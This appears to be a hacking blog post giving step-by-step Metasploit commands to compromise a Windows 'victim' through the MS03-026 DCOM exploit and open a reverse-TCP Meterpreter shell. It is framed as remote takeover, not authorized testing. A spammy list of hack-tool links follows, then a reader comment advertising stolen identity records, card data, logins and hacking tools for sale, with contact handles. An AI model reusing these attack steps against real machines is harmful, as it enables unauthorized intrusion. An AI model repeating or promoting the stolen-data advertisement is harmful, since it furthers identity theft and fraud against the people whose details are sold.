Friday, August 21, 2020

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

Related posts


  1. Wifi Hacker Tools For Windows
  2. Hack Tools For Ubuntu
  3. Hacking Tools Software
  4. Black Hat Hacker Tools
  5. Hack Tools
  6. Hacker Tool Kit
  7. Easy Hack Tools
  8. Hacking Tools For Kali Linux
  9. Hack Tools
  10. Pentest Tools Framework
  11. Growth Hacker Tools
  12. Game Hacking
  13. Top Pentest Tools
  14. Ethical Hacker Tools
  15. Hack Tools Github
  16. Hacker Tools Apk Download
  17. Bluetooth Hacking Tools Kali
  18. How To Install Pentest Tools In Ubuntu
  19. Hack And Tools
  20. Pentest Tools Bluekeep
  21. What Are Hacking Tools
  22. Top Pentest Tools
  23. Hacking Tools Pc
  24. Hacking Tools For Kali Linux
  25. Wifi Hacker Tools For Windows
  26. Pentest Tools Kali Linux
  27. Hackrf Tools
  28. Growth Hacker Tools
  29. Hack Tools
  30. Nsa Hack Tools
  31. Pentest Tools For Windows
  32. Hacker Tools Windows
  33. New Hack Tools
  34. Hack Tools
  35. Hack Tools Mac
  36. Blackhat Hacker Tools
  37. Hacking Tools Windows 10
  38. Pentest Tools Github
  39. Top Pentest Tools
  40. Hack Tools For Ubuntu
  41. Hacker Tool Kit
  42. Hacking Tools Mac
  43. Hacking Tools Usb
  44. Hacking Apps
  45. Hack Tools For Mac
  46. Hacking Tools For Kali Linux
  47. Pentest Tools Download
  48. Pentest Tools Find Subdomains
  49. Hack Tools For Mac
  50. Hacking Tools Usb
  51. Hacker Tools Free Download
  52. Hacker Techniques Tools And Incident Handling
  53. Hack Tools
  54. Hacker Techniques Tools And Incident Handling
  55. Physical Pentest Tools
  56. Pentest Tools Android
  57. Pentest Tools Port Scanner
  58. Hacking Tools Download
  59. Nsa Hack Tools Download
  60. Top Pentest Tools
  61. Pentest Tools Website
  62. Hacking Tools 2020
  63. Hacking Tools For Mac
  64. Hacking Tools For Windows Free Download
  65. Hackers Toolbox
  66. What Is Hacking Tools
  67. Beginner Hacker Tools
  68. Pentest Tools Alternative
  69. Tools For Hacker
  70. Hacker Search Tools
  71. New Hack Tools

1 comments:

  1. FULLZ AVAILABLE WITH HIGH CREDIT SCORES 700+
    (Spammed From Credit Bureau of USA)

    =>Contact 24/7<=

    Telegram> @leadsupplier
    ICQ> 752822040
    Email> exploit.tools4u@gmail.com

    FRESHLY SPAMMED
    VALID INFO WITH VALID DL EXPIRIES

    *All info included*
    NAME+SSN+DOB+DL+DL-STATE+ADDRESS

    Employee & Bank details included
    CC & CVV'S ONLY USA $8 FOR EACH

    $1 for SSN+DOB
    $2 for SSN+DOB+DL
    $5 for High credit fullz 700+
    (bulk order negotiable)
    *Payment in all crypto currencies will be accepted

    ->You can buy few for testing
    ->Invalid or wrong info will be replaced
    ->Serious buyers needed for long term
    ->Very fast delivery

    PLEASE DON'T ASK ANYTHING FOR FREE

    TOOLS & TUTORIALS AVAILABLE FOR SPAMMING & HACKING

    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    SQL Injector = 250$
    Premium Accounts (Netflix, coinbase, FedEx, Pornhub, etc) =25$
    Paypal Logins = 150$ (10 Logins)
    Bitcoin Cracker = 500$
    SMTP Linux Root = 300$
    DUMPS with pins track 1 and 2 = 85$
    Socks, rdp's, vpn = 25$
    Php mailer = 25$
    Server I.P's = 100$ (1k ip's)
    HQ Emails with passwords = 100$ (1k emails+pass)

    *If you need a valid vendor it's very prime chance, you'll never be disappointed*

    Telegram> @leadsupplier
    ICQ> 752822040
    Email> exploit.tools4u@gmail.com

    ReplyDelete